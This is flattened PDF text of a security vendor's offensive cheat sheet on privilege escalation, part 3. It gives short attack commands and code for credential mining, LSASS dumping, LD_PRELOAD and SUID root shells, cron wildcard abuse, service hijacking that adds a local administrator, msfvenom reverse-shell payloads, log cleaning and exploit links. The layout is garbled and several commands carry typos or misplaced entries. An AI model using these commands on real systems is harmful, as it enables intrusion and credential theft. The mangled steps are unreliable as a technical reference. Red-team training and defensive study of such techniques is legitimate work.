
Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


PASSWORD MINING IN KEEPASS

Domain: No Seatbelt.exe keepass


Or
Local Admin: Yes KeeTheft.exe

OS: Windows

Type: Enumeration & Hunt

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


PASSWORD MINING IN WINDOWSVAULT

Domain: No Seatbelt.exe WindowsVault

Local Admin: Yes

OS: Windows

Type: Enumeration & Hunt

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


PASSWORD MINING IN SECPACKAGECREDS

Domain: No Seatbelt.exe SecPackageCreds

Local Admin: Yes

OS: Windows

Type: Enumeration & Hunt

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


PASSWORD MINING IN PUTTYHOSTKEYS

Domain: No Seatbelt.exe PuttyHostKeys

Local Admin: Yes

OS: Windows

Type: Enumeration & Hunt

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


PASSWORD MINING IN RDCMANFILES

Domain: No Seatbelt.exe RDCManFiles

Local Admin: Yes

OS: Windows

Type: Enumeration & Hunt

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


PASSWORD MINING IN RDPSAVEDCONNECTIONS

Domain: No Seatbelt.exe RDPSavedConnections

Local Admin: Yes

OS: Windows

Type: Enumeration & Hunt

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


PASSWORD MINING IN MASTERKEYS

Domain: No SharpDPAPI masterkeys

Local Admin: Yes

OS: Windows

Type: Enumeration & Hunt

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


PASSWORD MINING IN BROWSERS

Domain: No SharpWeb.exe all

Local Admin: Yes

OS: Windows

Type: Enumeration & Hunt

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


PASSWORD MINING IN FILES

Domain: No SauronEye.exe -d C:\Users\vincent\Desktop\ --filetypes .txt .doc .docx


.xls --contents --keywords password pass* -v`
Local Admin: Yes

OS: Windows

Type: Enumeration & Hunt

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


PASSWORD MINING IN LDAP

Domain: No SharpLDAPSearch.exe "(&(objectClass=user)(cn=*svc*))"


"samaccountname"
Local Admin: Yes Or
Import-Module .\PowerView.ps1
OS: Windows Get-DomainComputer COMPUTER -Properties ms-mcs-
AdmPwd,ComputerName,ms-mcs-AdmPwdExpirationTime
Type: Enumeration & Hunt

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


PASSWORD MINING IN CLIPBOARD

Domain: No execute-assembly /root/SharpClipHistory.exe

Local Admin: Yes

OS: Windows

Type: Enumeration & Hunt

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


PASSWORD MINING IN GMSA PASSWORD

Domain: No GMSAPasswordReader.exe --accountname SVC_SERVICE_ACCOUNT

Local Admin: Yes

OS: Windows

Type: Delegate tokens

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


DELEGATE TOKENS VIA RDP

Domain: Y/N ./fake_rdp.py


Or
Local Admin: Yes pyrdp-mitm.py 192.168.1.10 -k private_key.pem -c certificate.pem

OS: Windows

Type: Delegate tokens

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


DELEGATE TOKENS VIA FTP

Domain: Y/N FakeFtpServer fakeFtpServer = new FakeFtpServer();


fakeFtpServer.addUserAccount(new UserAccount("user", "password",
Local Admin: Yes "c:\\data"));
FileSystem fileSystem = new WindowsFakeFileSystem();
OS: Windows fileSystem.add(new DirectoryEntry("c:\\data"));
fileSystem.add(new FileEntry("c:\\data\\file1.txt", "abcdef
Type: Delegate tokens 1234567890"));
fileSystem.add(new FileEntry("c:\\data\\run.exe"));
Difficulty fakeFtpServer.setFileSystem(fileSystem);
fakeFtpServer.start();
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


FAKE LOGON SCREEN

Domain: No execute-assembly fakelogonscreen.exe

Local Admin: Yes

OS: Windows

Type: Phish

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


ABUSING WINRM SERVICES

Domain: Y/N RogueWinRM.exe -p C:\windows\system32\cmd.exe

Local Admin: Yes

OS: Windows

Type: Abuse Service

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


CERTIFICATE ABUSE

Domain: Yes ceritify.exe request /ca:dc.domain.local\DC-CA /template:User…


Rubeus.exe asktgy /user:CORP\itadmin /certificate:C:\cert.pfx
Local Admin: Yes /password:password

OS: Windows

Type: Abuse Certificate

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


SUDO LD_PRELOAD

Domain: No 1.
#include <stdio.h>
Local Admin: Yes #include <sys/types.h>
#include <stdlib.h>
OS: Linux void _init() {
unsetenv("LD_PRELOAD");
Type: Injection setgid(0);
setuid(0);
Difficulty system("/bin/bash");
}
APT Used

2.
gcc -fPIC -shared -o /tmp/ldreload.so ldreload.c -nostartfiles
3.
sudo LD_RELOAD=tmp/ldreload.so apache2
4.
id
Detection

HADESS | SECURE AGILE DEVELOPMENT



ABUSING FILE PERMISSION VIA SUID BINARIES - (.SO INJECTION)

Domain: No 1.
Mkdir /home/user/.config
Local Admin: Yes 2.
#include <stdio.h>
OS: Linux #include <stdlib.h>
static void inject() _attribute _((constructor));
Type: Injection void inject() {
system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash
Difficulty -p");
}
APT Used

3.
gcc -shared -o /home/user/.config/libcalc.so -
fPIC/home/user/.config/libcalc.c
4.
/usr/local/bin/suid-so
5.
Detection
id
HADESS | SECURE AGILE DEVELOPMENT

DLL INJECTION

Domain: Y/N 1.
RemoteDLLInjector64
Local Admin: Yes Or
MemJect
OS: Windows Or
https://github.com/tomcarver16/BOF-DLL-Inject
Type: Injection 2.
#define PROCESS_NAME "csgo.exe"
Difficulty Or
RemoteDLLInjector64.exe pid C:\runforpriv.dll
APT Used

Or
mandllinjection ./runforpriv.dll pid

Detection

HADESS | SECURE AGILE DEVELOPMENT



EARLY BIRD INJECTION

Domain: No hollow svchost.exe pop.bin

Local Admin: Yes

OS: Windows

Type: Injection

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT



PROCESS INJECTION THROUGH MEMORY SECTION

Domain: No sec-shinject PID /path/to/bin

Local Admin: Yes

OS: Windows

Type: Injection

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT



ABUSING SCHEDULED TASKS VIA CRON PATH OVERWRITE

Domain: No echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >


systemupdate.sh;
Local Admin: Yes chmod +x systemupdate.sh
Wait a while
OS: Linux /tmp/bash -p
id && whoami
Type: Abusing Scheduled Tasks

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT



ABUSING SCHEDULED TASKS VIA CRON WILDCARDS

Domain: No echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >


/home/user/systemupdate.sh;
Local Admin: Yes touch /home/user/ --checkpoint=1;
touch /home/user/ --checkpoint-action=exec=sh\systemupdate.sh
OS: Linux Wait a while
/tmp/bash -p
Type: Abusing Scheduled Tasks id && whoami

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT



ABUSING FILE PERMISSION VIA SUID BINARIES - SYMLINK)

Domain: No 1.
su - www-data;
Local Admin: Yes 2.
nginxed-root.sh /var/log/nginx/error.log;
OS: Linux 3.
In root user
Type: Abusing File Permission invoke-rc.d nginx rotate >/dev/null 2>&1

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT



ABUSING FILE PERMISSION VIA SUID BINARIES - SYMLINK)

Domain: No 1.
su - www-data;
Local Admin: Yes 2.
nginxed-root.sh /var/log/nginx/error.log;
OS: Linux 3.
In root user
Type: Abusing File Permission invoke-rc.d nginx rotate >/dev/null 2>&1

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT



ABUSING FILE PERMISSION VIA SUID BINARIES - ENVIRONMENT VARIABLES #1)

Domain: No 1.
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }'
Local Admin: Yes >/tmp/service.c;
2.
OS: Linux gcc /tmp/services.c -o /tmp/service;
3.
Type: Abusing File Permission export PATH=/tmp:$PATH;
4.
Difficulty /usr/local/bin/sudi-env; id
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT



ABUSING FILE PERMISSION VIA SUID BINARIES - ENVIRONMENT VARIABLES #2)

Domain: No env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown


root.root /tmp/bash && chmod +S /tmp/bash)' /bin/sh -c
Local Admin: Yes /usr/local/bin/suid-env2; set +x; /tmp/bash -p'

OS: Linux

Type: Abusing File Permission

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT



DLL HIJACKING

Domain: No 1.
Windows_dll.c:
Local Admin: Yes cmd.exe /k net localgroup administrators user /add
2.
OS: Windows x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll
3.
Type: Abuse Privilege sc stop dllsvc & sc start dllsvc

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT



ABUSING SERVICES VIA BINPATH

Domain: No 1.
sc config daclsvc binpath= "net localgroup administrators user /add"
Local Admin: Yes 2.
sc start daclsvc
OS: Windows

Type: Abuse Privilege

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT



ABUSING SERVICES VIA UNQUOTED PATH

Domain: No 1.
msfvenom -p windows/exec CMD='net localgroup administrators user
Local Admin: Yes /add' -f exe-service -o common.exe
2.
OS: Windows Place common.exe in ‘C:\Program Files\Unquoted Path Service’.
3.
Type: Abuse Privilege sc start unquotedsvc

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT



ABUSING SERVICES VIA REGISTRY

Domain: No 1.
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v
Local Admin: Yes ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
2.
OS: Windows sc start regsvc

Type: Abuse Privilege

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT



ABUSING SERVICES VIA EXECUTABLE FILE

Domain: No 1.
copy /y c:\Temp\x.exe "c:\Program Files\File Permissions
Local Admin: Yes Service\filepermservice.exe"
2.
OS: Windows sc start filepermsvc

Type: Abuse Privilege

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT



ABUSING SERVICES VIA AUTORUN

Domain: No 1.
In Metasploit (msf > prompt) type: use multi/handler
Local Admin: Yes In Metasploit (msf > prompt) type: set payload
windows/meterpreter/reverse_tcp
OS: Windows In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
In Metasploit (msf > prompt) type: run
Type: Abuse Privilege Open an additional command prompt and type:
msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP
Difficulty Address] -f exe -o
program.exe
APT Used

2.
Place program.exe in ‘C:\Program Files\Autorun Program’.

Detection

HADESS | SECURE AGILE DEVELOPMENT



ABUSING SERVICES VIA ALWAYSINSTALLELEVATED

Domain: No 1.
msfvenom -p windows/exec CMD='net localgroup
Local Admin: Yes administrators user /add' -f msi-nouac -o setup.msi
2.
OS: Windows msiexec /quiet /qn /i C:\Temp\setup.msi
Or
Type: Abuse Privilege SharpUp.exe AlwaysInstallElevated

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT



ABUSING SERVICES VIA SECREATETOKEN

Domain: Y/N 1.
.load C:\dev\PrivEditor\x64\Release\PrivEditor.dll
Local Admin: Yes 2.
!rmpriv
OS: Windows

Type: Abuse Privilege

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT



ABUSING SERVICES VIA SEDEBUG

Domain: Y/N 1.
Conjure-LSASS
Local Admin: Yes Or
syscall_enable_priv 20
OS: Windows

Type: Abuse Privilege

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT



REMOTE PROCESS VIA SYSCALLS (HELLSGATE|HALOSGATE)

Domain: Y/N injectEtwBypass pid

Local Admin: Yes

OS: Windows

Type: Abuse Privilege

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT



ESCALATE WITH DUPLICATETOKENEX

Domain: Y/N PrimaryTokenTheft.exe pid


Or
Local Admin: Yes TokenPlaye.exe --impersonate --pid pid

OS: Windows

Type: Abuse Privilege

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT



ABUSING SERVICES VIA SEINCREASEBASEPRIORITY

Domain: Y/N start /realtime SomeCpuIntensiveApp.exe

Local Admin: Yes

OS: Windows

Type: Abuse Privilege

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT



ABUSING SERVICES VIA SEMANAGEVOLUME

Domain: Y/N Just only compile and run SeManageVolumeAbuse

Local Admin: Yes

OS: Windows

Type: Abuse Privilege

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT



ABUSING SERVICES VIA SERELABEL

Domain: Y/N 1.
WRITE_OWNER access to a resource, including files and folders.
Local Admin: Yes 2.
Run for privilege escalation
OS: Windows

Type: Abuse Privilege

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT



ABUSING SERVICES VIA SERESTORE

Domain: Y/N 1. Launch PowerShell/ISE with the SeRestore privilege present.


2. Enable the privilege with Enable-SeRestorePrivilege).
Local Admin: Yes 3. Rename utilman.exe to utilman.old
4. Rename cmd.exe to utilman.exe
OS: Windows 5. Lock the console and press Win+U

Type: Abuse Privilege

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT



ABUSE VIA SEBACKUP

Domain: Y/N 1.
In Metasploit (msf > prompt) type: use auxiliary/server/capture/http_basic
Local Admin: Yes In Metasploit (msf > prompt) type: set uripath x
In Metasploit (msf > prompt) type: run
OS: Windows 2.
In taskmgr and right-click on the “iexplore.exe” in the “Image Name”
Type: Abuse Privilege column
and select “Create Dump File” from the popup menu.
Difficulty 3.
strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic"
APT Used

Select the Copy the Base64 encoded string.


In command prompt type: echo -ne [Base64 String] | base64 -d

Detection

HADESS | SECURE AGILE DEVELOPMENT



ABUSING VIA SECREATEPAGEFILE

Domain: Y/N HIBR2BIN /PLATFORM X64 /MAJOR 6 /MINOR 1 /INPUT hiberfil.sys


/OUTPUT uncompressed.bin
Local Admin: Yes

OS: Windows

Type: Abuse Privilege

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT



ABUSING VIA SESYSTEMENVIRONMENT

Domain: Y/N 1.
.load C:\dev\PrivEditor\x64\Release\PrivEditor.dll
Local Admin: Yes 2.
TrustExec.exe -m exec -c "whoami /priv" -f
OS: Windows

Type: Abuse Privilege

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT



ABUSING VIA SETAKEOWNERSHIP

Domain: Y/N 1. takeown.exe /f "%windir%\system32"


2. icalcs.exe "%windir%\system32" /grant "%username%":F
Local Admin: Yes 3. Rename cmd.exe to utilman.exe
4. Lock the console and press Win+U
OS: Windows

Type: Abuse Privilege

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT



ABUSING VIA SETCB

Domain: Y/N 1.
PSBits
Local Admin: Yes Or
PrivFu
OS: Windows 2.
psexec.exe -i -s -d cmd.exe
Type: Abuse Privilege

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT



ABUSING VIA SETRUSTEDCREDMANACCESS

Domain: Y/N 1.
.load C:\dev\PrivEditor\x64\Release\PrivEditor.dll
Local Admin: Yes Or
CredManBOF
OS: Windows 2.
TrustExec.exe -m exec -c "whoami /priv" -f
Type: Abuse Privilege

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT



ABUSING TOKENS VIA SEASSIGNPRIMARYTOKEN

Domain: Y/N JuicyPotato.exe


Or
Local Admin: Yes https://github.com/decoder-it/juicy_2
https://github.com/antonioCoco/RoguePotato
OS: Windows

Type: Abuse Privilege

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT



ABUSING VIA SECREATEPAGEFILE

Domain: Y/N 1.
./WELA.ps1 -LogFile .\Security.evtx -EventIDStatistics
Local Admin: Yes 2.
flog -s 10s -n 200
OS: Windows Or
invoke-module LogCleaner.ps1
Type: Abuse Privilege

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


About Hadess
Savior of your Business to combat cyber threats Contact Us
Hadess performs offensive cybersecurity services
through infrastructures and software that To request additional information about Hadess’s services, please fill out the form
below. A Hadess representative will contact you shortly.
include vulnerability analysis, scenario attack
planning, and implementation of custom
integrated preventive projects. We organized Website:
our activities around the prevention of corporate,
www.hadess.io
industrial, and laboratory cyber threats.
Email:
[email protected]
Phone No.
+989362181112
Company No.

+982128427515
+982177873383

hadess_security

HADESS | SECURE AGILE DEVELOPMENT


Hadess
Products and Services

SAST | Audit Your Products Penetration Testing | PROTECTION PRO

Identifying and helping to address hidden weaknesses in Fully assess your organization’s threat detection and response
your Applications. capabilities with a simulated cyber-attack.

RASP | Protect Applications and APIs Anywhere Red Teaming Operation | PROTECTION PRO
Fully assess your organization’s threat detection and response
Identifying and helping to address hidden weaknesses in
capabilities with a simulated cyber-attack.
your organization’s security.

PWN Z1 | Audit Your PPP


Identifying and helping to address hidden weaknesses in
your organization’s security

HADESS | SECURE AGILE DEVELOPMENT


HADESS
Secure Agile Development
WWW.HADESS.IO

43 METHODS FOR PRIVILEGE


ESCALATION
PART 3

HADESS | SECURE AGILE DEVELOPMENT


PART 1,2 SUMMARY

No Method DOMAIN APT No Method DOMAIN APT No Method DOMAIN APT

1 Abusing Sudo Binaries NO 9 Abusing N 17 Impersonation Token with


SeImpersontePrivilege
YES
journalctl

2 Abusing Scheduled Tasks


Y/N 10 Abusing VDS N 18
Impersonation Token with
YES
SeLoadDriverPrivilege

3 Golden Ticket
Scheduled Tasks
With
Yes 11 Abusing Browser N 19 OpenVPN NO
Credentials

4 Abusing Interpreter
NO 12 Abusing LDAP YES 20 Bash History NO
Capabilities

5 Abusing Binary Capabilities


NO 13 LLMNR Poisoning YES 21 Package Capture Y/N

6 Abusing ActiveSessions
NO 14 Abusing Certificate
YES 22 NFS Root Squashing
NO
Capabilities Services

7 15
Escalate with TRUSTWORTHY MySQL UDF Code
in SQL Server Y/N Y/N 23 Abusing Access
Y/N
Injection Control List

8 Abusing Mysql Y/N 16 Impersonation Token


ImpersonateLoggedOnuser
with
YES 24 Escalate With
YES
run as root SeBackupPrivilege

HADESS | SECURE AGILE DEVELOPMENT


PART 1,2 SUMMARY

No Method DOMAIN APT No Method DOMAIN APT No Method DOMAIN APT

25 Escalate With
SeImpersonatePrivilege
YES 33 Abusing Gdbus Y/N 41 DirtyC0w No

26 Escalate With
SeLoadDriverPrivilege
YES 34 Abusing Trusted DC YES 42
CVE-2016-1531
No

27 Escalate With
ForceChangePassword
YES 35 NTLM Relay YES 43 Polkit NO

28 Escalate With YES 36 Exchange Relay YES 44 DirtyPipe NO


GenericWrite

29 Abusing GPO YES 37 Dumping with YES 45 PwnKit No


diskshadow

30 Pass-the-Ticket YES 38 Dumping with


YES 46 ms14_058
NO
vssadmin

31 Golden Ticket YES 39 Password Spraying


Y/N 47 Hot Potato
Y/N

32 Abusing Splunk
NO 40 AS-REP Roasting YES 48 Intel SYSRET
No
Universal Forwarder

HADESS | SECURE AGILE DEVELOPMENT


PART 1,2 SUMMARY

No Method DOMAIN APT No Method DOMAIN APT No Method DOMAIN APT

49 PrintNightmare
YES 57 DLL Injection Y/N 65 DLL Hijacking
Y/N

50 Folina
Y/N 58 Early Bird Injection Y/N 66
Abusing
binPath
Services via
No

51 ALPC
No 59 Process Injection through
Y/N 67 Abusing Services via
NO
Memory Section Unquoted Path

52 60
RemotePotato0 Abusing Scheduled Tasks
YES via Cron Path Overwrite Y/N 68 Abusing Services
NO
via Registry

53 CVE-2022-26923 No 61 Abusing Scheduled Tasks


via Cron Wildcards
Y/N 69 Abusing Services via
No
Executable File

54 62
Abusing File Permission
MS14-068 No No 70 Abusing Services via
NO
via SUID Binaries -
Symlink)
Autorun

55 63
Abusing File Permission via
Sudo No SUID Binaries - Environment No 71 Abusing Services via
No
LD_PRELOAD Variables #1) AlwaysInstallElevated

56 64
Abusing File Permission Abusing File Permission via
via SUID Binaries - .so NO SUID Binaries - Environment No 72 Abusing Services via
No
injection) Variables #2) SeCreateToken

HADESS | SECURE AGILE DEVELOPMENT


PART 1,2 SUMMARY

No Method DOMAIN APT No Method DOMAIN APT No Method DOMAIN APT

73 Abusing
SeDebug
Services via
No 81 Abusing via No 89 Password
Memory(#1)
Mining in
No
SeCreatePagefile

74 82
Remote Process via Abusing via
90
Password Mining in
Syscalls No No Memory(#2) No
SeSystemEnvironment
(HellsGate|HalosGate)

75 Escalate
DuplicateTokenEx
With
No 83 Abusing via
No 91 Password Mining NO
SeTakeOwnership in Registry

76 Abusing Services
SeIncreaseBasePriority
via
No 84 Abusing via SeTcb
No 92
Password
General
Mining
Events
in
via NO
SeAudit

77 Abusing Services via


No 85 Abusing
SeTrustedCredManAccess
via
No 93
Password
Security
Mining
Events
in
via No
SeManageVolume
SeSecurity

78 Abusing Services via


No 86 Abusing tokens via
SeAssignPrimaryToken
No 94 Startup Applications
NO
SeRelabel

79 Abusing Services
No 87 Abusing via
No 95 Password Mining in
No
via SeRestore SeCreatePagefile McAfeeSitelistFiles

80 Abuse via SeBackup


NO 88 Certificate Abuse Y/N 96 Password Mining in
YES
CachedGPPPasswor

HADESS | SECURE AGILE DEVELOPMENT


PART 1,2 SUMMARY

No Method DOMAIN APT No Method DOMAIN APT No Method DOMAIN APT

97 Password Mining
DomainGPPPassword
in
YES 105 Password Mining in
Y/N 113 Abusing WinRM Services
Y/N
Browsers

98 Password
KeePass
Mining in
No 106 Password Mining in Y/N
Files

99 Password
WindowsVault
Mining in
No 107 Password Y/N
Mining in LDAP

100 Password Mining in


YES 108 Password Mining in
Y/N
SecPackageCreds Clipboard

101 Password Mining in


YES 109 Password Mining in
Y/N
PuttyHostKeys GMSA Password

102 Password Mining in


YES 110 Delegate tokens Y/N
RDCManFiles via RDP

103 Password Mining


RDPSavedConnections
in
YES 111 Delegate tokens
Y/N
via FTP

104 Password Mining in


NO 112 Fake Logon Y/N
MasterKeys Screen

HADESS | SECURE AGILE DEVELOPMENT


PART 3
DUMP LSASS WITH SILENTPROCESSEXIT

Domain: No SilentProcessExit.exe pid

Local Admin: Yes

OS: Windows

Type: Enumeration & Hunting

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


LSASS SHTINKERING

Domain: No HKLM\SOFTWARE\Microsoft\Windows\Windows Error


Reporting\LocalDumps->2
Local Admin: Yes LSASS_Shtinkering.exe pid

OS: Windows

Type: Enumeration & Hunting

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


ANDREWSPECIAL

Domain: No AndrewSpecial.exe

Local Admin: Yes

OS: Windows

Type: Enumeration & Hunting

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


CCACHE TICKET REUSE FROM /TMP

Domain: Yes ls /tmp/ | grep krb5cc_X


export KRB5CCNAME=/tmp/krb5cc_X
Local Admin: Yes

OS: Linux

Type: Enumeration & Hunting

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


CCACHE TICKET REUSE FROM KEYRING

Domain: Yes https://github.com/TarlogicSecurity/tickey


/tmp/tickey -i
Local Admin: Yes

OS: Linux

Type: Enumeration & Hunting

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


CCACHE TICKET REUSE FROM SSSD KCM

Domain: Yes git clone https://github.com/fireeye/SSSDKCMExtractor


python3 SSSDKCMExtractor.py --database secrets.ldb --key
Local Admin: Yes secrets.mkey

OS: Linux

Type: Enumeration & Hunting

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


CCACHE TICKET REUSE FROM KEYTAB

Domain: Yes git clone https://github.com/its-a-feature/KeytabParser


python KeytabParser.py /etc/krb5.keytab
Local Admin: Yes klist -k /etc/krb5.keytab

OS: Linux/Windows/Mac Or

Type: Enumeration & Hunting klist.exe -t -K -e -k FILE:C:\Users\User\downloads\krb5.keytab


python3 keytabextract.py krb5.keytab
Difficulty ./bifrost -action dump -source keytab -path test
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


SSH FORWARDER

Domain: No ForwardAgent yes


SSH_AUTH_SOCK=/tmp/ssh-haqzR16816/agent.16816 ssh
Local Admin: Yes bob@boston

OS: Linux

Type: Enumeration & Hunting

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


APPLESCRIPT

Domain: No (EmPyre) > listeners


(EmPyre: listeners) > set Name mylistener
Local Admin: Yes (EmPyre: listeners) > execute
(EmPyre: listeners) > usestager applescript mylistener
OS: Mac (EmPyre: stager/applescript) > execute

Type: Enumeration & Hunting

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


DLL SEARCH ORDER HIJACKING

Domain: No https://github.com/slaeryan/AQUARMOURY/tree/master/Brownie
Brownie
Local Admin: Yes

OS: Windows

Type: Hijack

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


SLUI FILE HANDLER HIJACK LPE

Domain: No https://github.com/bytecode77/slui-file-handler-hijack-privilege-
escalation
Local Admin: Yes Slui.exe

OS: Windows

Type: Hijack

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


CDPSVC DLL HIJACKING

Domain: No Cdpsgshims.exe

Local Admin: Yes

OS: Windows

Type: Hijack

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


MAGNIFY.EXE DLL SEARCH ORDER HIJACKING

Domain: No copy payload dll as igdgmm64.dll to SYSTEM path %PATH% which is


writeable such as C:\python27
Local Admin: Yes Press WinKey+L
Press Enter
OS: Windows Press WinKey++(plusKey) on login screen which show password box.
then payload dll will execute as SYSTEM access.
Type: Hijack

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


CDPSVC SERVICE

Domain: No Find Writable SYSTEM PATH with acltest.ps1 (such as C:\python27)


C:\CdpSvcLPE> powershell -ep bypass ". .\acltest.ps1"
Local Admin: Yes Copy cdpsgshims.dll to C:\python27
make C:\temp folder and copy impersonate.bin to C:\temp
OS: Windows C:\CdpSvcLPE> mkdir C:\temp
C:\CdpSvcLPE> copy impersonate.bin C:\temp
Type: Hijack Reboot (or stop/start CDPSvc as an administrator)
cmd wil prompt up with nt authority\system.
Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


HIVENIGHTMARE

Domain: Yes HiveNightmare.exe 200

Local Admin: Yes

OS: Windows

Type: 0/1 Exploit

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


CVE-2021-30655

Domain: No https://github.com/thehappydinoa/rootOS
Python rootOS.py
Local Admin: Yes

OS: Mac

Type: 0/1 Exploit

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


CVE-2019-8526

Domain: No https://github.com/amanszpapaya/MacPer
Python main.py
Local Admin: Yes

OS: Mac

Type: 0/1 Exploit

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


CVE-2020-9771

Domain: No https://github.com/amanszpapaya/MacPer
Python main.py
Local Admin: Yes

OS: Mac

Type: 0/1 Exploit

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


CVE-2021-3156

Domain: No https://github.com/amanszpapaya/MacPer
Python main.py
Local Admin: Yes

OS: Mac

Type: 0/1 Exploit

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


CVE-2018-4280

Domain: No https://github.com/bazad/launchd-portrep
./launchd-portrep 'touch /tmp/exploit-success'=
Local Admin: Yes

OS: Mac

Type: 0/1 Exploit

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


ABUSING WITH FILERESTOREPRIVILEGE

Domain: Y/N poptoke.exe

Local Admin: Yes

OS: Windows

Type: Abuse Privilege

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


ABUSING WITH RESTOREANDBACKUPPRIVILEGES

Domain: Y/N poptoke.exe

Local Admin: Yes

OS: Windows

Type: Abuse Privilege

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


ABUSING WITH SHADOWCOPYBACKUPPRIVILEGE

Domain: Y/N poptoke.exe

Local Admin: Yes

OS: Windows

Type: Abuse Privilege

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


ABUSING WITH SHADOWCOPY

Domain: Y/N poptoke.exe

Local Admin: Yes

OS: Windows

Type: Abuse Privilege

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


DYNAMIC PHISHING

Domain: Y/N https://github.com/thehappydinoa/rootOS


Python rootOS.py
Local Admin: Yes

OS: Mac

Type: Phish

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


RACE CONDITIONS

Domain: No echo "net localgroup administrators attacker /add" > C:\temp\not-


evil.bat
Local Admin: Yes tempracer.exe C:\ temp\*.bat

OS: Windows

